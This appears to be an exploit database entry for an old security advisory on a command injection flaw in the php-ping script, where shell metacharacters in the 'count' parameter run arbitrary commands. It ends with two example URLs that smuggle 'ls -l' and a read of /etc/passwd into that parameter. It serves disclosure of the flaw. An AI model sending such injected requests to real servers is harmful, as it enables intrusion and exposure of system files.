PHP-ping - 'Count' Command Execution

Author: ppp-design
type: webapps
platform: php
port: 
date_added: 2003-12-29  
date_updated: 2012-12-18  
verified: 1  
codes: OSVDB-3254  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23487.txt  

source: https://www.securityfocus.com/bid/9309/info

It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
metacharacters via the 'count' parameter of php-ping.php script.

Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software.

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21